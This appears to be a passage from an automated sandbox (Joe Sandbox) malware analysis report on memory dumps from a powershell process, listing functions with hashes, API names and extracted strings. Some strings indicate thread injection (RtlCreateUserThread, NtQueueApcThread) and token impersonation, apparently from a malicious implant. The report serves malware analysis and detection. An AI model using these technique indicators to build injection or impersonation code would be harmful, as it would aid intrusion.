                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                                    • String ID:
                                                    • API String ID: 996410232-0
                                                    • Opcode ID: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                                                    • Instruction ID: a73402fa2dae793b3ed3589d4b759c136341b68734bb66b3c00fff1965466238
                                                    • Opcode Fuzzy Hash: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                                                    • Instruction Fuzzy Hash: D041082220478566FE15DBA67B1865A6B98B79CBC8F0B4020DD068FF66EE3CD406D710
                                                    Function 0000022EFA0C2D70 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 94stringCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                                                    • String ID: %s&%s$?%s
                                                    • API String ID: 1095232423-1750478248
                                                    • Opcode ID: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                                                    • Instruction ID: 5088b933b5a4fe4c604a4814eab3de4091068bfc2908877f1d7c835cf542c88d
                                                    • Opcode Fuzzy Hash: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                                                    • Instruction Fuzzy Hash: 4F41A462610E81A1EE11AF6AE2492E8A3A0FF9CB85F055511DF482BF71DF38D1A2D340
                                                    Function 0000022EFA0DAC98 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 2998201375-0
                                                    • Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                                                    • Instruction ID: cfe85d80bfa5cc3588154a56812bf9ac53861733f1f05f066463eaffd70f9d87
                                                    • Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                                                    • Instruction Fuzzy Hash: 4A41913222478096EF608F55A2847697BA1FB8CB94F194135EB8A5BFA5DF3CC841D700
                                                    Function 0000022EF9B1F064 Relevance: 7.6, APIs: 5, Instructions: 58fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$free$_callnewhfclosefwritemalloc
                                                    • String ID:
                                                    • API String ID: 1696598829-0
                                                    • Opcode ID: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                                                    • Instruction ID: a97f0bc5df25d44a4decfae44be691092758bc4e9a706b370a7bd867fd7172e9
                                                    • Opcode Fuzzy Hash: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                                                    • Instruction Fuzzy Hash: F111051130864060EE31EA93A2393AE6381E7A4FD0F454125AED90BFCADE2CC1019748
                                                    Function 0000022EF9B399EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno_errno
                                                    • String ID:
                                                    • API String ID: 2964073243-0
                                                    • Opcode ID: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                                                    • Instruction ID: 00e06eae99d833862ec1a4d067523ed5e6bddb9d6da4a13b80370d1023ccfb81
                                                    • Opcode Fuzzy Hash: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                                                    • Instruction Fuzzy Hash: DD01F465721A49A4FF34ABE4CABD7AC22509BB0B32F938301C6A903BD2C73C44016718
                                                    Function 0000022EFA0DA5EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno_errno
                                                    • String ID:
                                                    • API String ID: 2964073243-0
                                                    • Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                                                    • Instruction ID: fa5e35910466e9a5453cd651084764f139d783254c7d8ece31e56489f4ec14ad
                                                    • Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                                                    • Instruction Fuzzy Hash: E101FF63721604A5FE196FE4EA8836C32519F98B32FA74310D5290FFF2CF3C4082A610
                                                    Function 0000022EFA0BD83C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s!%s
                                                    • API String ID: 0-2935588013
                                                    • Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                                                    • Instruction ID: e8996152d96a2dd37ec98bc35eaaae0f0c15b0e0e61dddb37716f46393388628
                                                    • Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                                                    • Instruction Fuzzy Hash: 72517765204640A6EF28DF91E254759B361F34CBD4F464022EF4A8BFA5EB3CC942E704
                                                    Function 0000022EF9B25228 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116stringCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _snprintfmallocstrrchr
                                                    • String ID: Failed to impersonate token: %d$t permissions in process: %d
                                                    • API String ID: 3587327836-1492073275
                                                    • Opcode ID: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                                                    • Instruction ID: c25c43ab841eda312eabcd22a95f1c272d8b0f98aac9ec142398968c6c2a5050
                                                    • Opcode Fuzzy Hash: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                                                    • Instruction Fuzzy Hash: EF41C62070424066EF35EFA6AA283AE6791F7A5BD4F454124EDC647F96CF7CC086E708
                                                    Function 0000022EFA0C2818 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93sleeppipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTick$CreateInfoPipeSleepStartup
                                                    • String ID: h
                                                    • API String ID: 1809008225-2439710439
                                                    • Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                                                    • Instruction ID: 9bc46e4276e08a8e36540263cdc059b30b9f856fa6443a2e420f502cfa405f1e
                                                    • Opcode Fuzzy Hash: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                                                    • Instruction Fuzzy Hash: B2418932600B849AEB10CFA5E84468EB7B5F388798F114115EF9C57FA8DF78C546CB40
                                                    Function 0000022EFA0CE1D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AccountInformationLookupToken_snprintf
                                                    • String ID: %s\%s
                                                    • API String ID: 2107350476-4073750446
                                                    • Opcode ID: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                                                    • Instruction ID: 064031cba514ca976e278ef9ebf93c96824b126d3602c6885bf9156367cc39cc
                                                    • Opcode Fuzzy Hash: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                                                    • Instruction Fuzzy Hash: E3312F22204FC1A5EB24CF61E9446DA6364F78CB88F458125EA895BF69DF3CC209D740
                                                    Function 0000022EFA0C4224 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: RtlCreateUserThread$ntdll.dll
                                                    • API String ID: 1646373207-2935400652
                                                    • Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                                                    • Instruction ID: 1cea38a5f73f893208cbb1de82f37cbd33b231544cc1bc8785ec3cc3d0c4130b
                                                    • Opcode Fuzzy Hash: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                                                    • Instruction Fuzzy Hash: 7D116D32204B8592DB20CF51F988549B7A8F78CB80F998175EA8D47F24DF38C555DB00
                                                    Function 0000022EFA0C3C0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: NtQueueApcThread$ntdll
                                                    • API String ID: 1646373207-1374908105
                                                    • Opcode ID: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                                                    • Instruction ID: 6b3c125176ec9614f7dc39bd3531d868156838c5a36f10a06a044e8469f510c0
                                                    • Opcode Fuzzy Hash: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                                                    • Instruction Fuzzy Hash: 5F01A225310B82A2EF00DBA6FA9825EA3A0F78DBD0F554521DE584BF74DF3CC451A700
                                                    Function 0000022EFA0C0C64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: IsWow64Process$kernel32
                                                    • API String ID: 1646373207-3789238822
                                                    • Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                                                    • Instruction ID: 60dd46899dd8396d4d2484fb9e8683ca5b161111a12ad29b972592bf531dfa53
                                                    • Opcode Fuzzy Hash: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                                                    • Instruction Fuzzy Hash: 66E09AA0321606A2EE04CBA5FAC832563A0EB8C780F491050998B0AF70EF2CC589FB00
                                                    Function 0000022EFA0C20AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                    • API String ID: 1646373207-736604160
                                                    • Opcode ID: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                                                    • Instruction ID: 5efbd80b6bd060809d9632dfbba06535aee3a2f79f259c5aba095eb4fd4d3d99
                                                    • Opcode Fuzzy Hash: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                                                    • Instruction Fuzzy Hash: 35D05E9075260BA1FE049BE1FACC2646350AB4DB40F4A10A5881E0EF70EE2CC19AF310
                                                    Function 0000022EFA0C20E4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                    • API String ID: 1646373207-3900151262
                                                    • Opcode ID: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                                                    • Instruction ID: a05087ec56a79c8515e049c014fbfd1f2214a34668b5387e56da578c0fe89db4
                                                    • Opcode Fuzzy Hash: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                                                    • Instruction Fuzzy Hash: 05D05E5075260BA1FE08ABE2FACC6681390AB5DB40F4910A0891A0FF70EE7CC199F310
                                                    Function 0000022EF9B2B3C0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                    • Instruction ID: ed651b794aa6ada30bb20561fad2f7ab0c4757cc1ff758d7d60d8e1279cf4603
                                                    • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                    • Instruction Fuzzy Hash: 5D61C732601600A6EF35CF99E7BD36833A1E779B54F26412DC9994BBA5CF34C441EB88
                                                    Function 0000022EFA0CBFC0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                    • Instruction ID: 455e3953f81d315fd51b7d6278bedf121fd673903d536ba3267b7137882d092f
                                                    • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                                                    • Instruction Fuzzy Hash: 30619C32641640B6EF54CB95FA4D7AA33E0E75CB59F264129DA055FFB1CB3CC842AB80
                                                    Function 0000022EF9B22170 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                                                    • String ID: not create token: %d
                                                    • API String ID: 1095232423-2272930512
                                                    • Opcode ID: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                                                    • Instruction ID: 650d9d309a08ee7777a19607750c823d736b95d9c80195e4b8ac57fa9bbac662
                                                    • Opcode Fuzzy Hash: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                                                    • Instruction Fuzzy Hash: 4941D662604E84A1EE269FAED2593E863B0FFA8B84F055511DF8857F11DF34D1B2E344
                                                    Function 0000022EFA0C4A04 Relevance: 6.1, APIs: 4, Instructions: 80synchronizationCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
                                                    • String ID:
                                                    • API String ID: 2495333179-0
                                                    • Opcode ID: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                                                    • Instruction ID: 5838c0bf24727e3fec5a0d6529961534a45cdba83ad517dccfd59cf5830ce3fe
                                                    • Opcode Fuzzy Hash: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                                                    • Instruction Fuzzy Hash: FA318D26600640A5EF64DFA2B68C26963A5FB4CF98F0A4514DE050FFA9DB3DC8C1E744
                                                    Function 0000022EFA0CC230 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Timestrtok$FileSystem_getptd_time64malloc
                                                    • String ID:
                                                    • API String ID: 460628555-0
                                                    • Opcode ID: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                                                    • Instruction ID: 8e4a1da06794bf1de9a0996a5944b2785c77b94142dfb9208234b57dc05d4f66
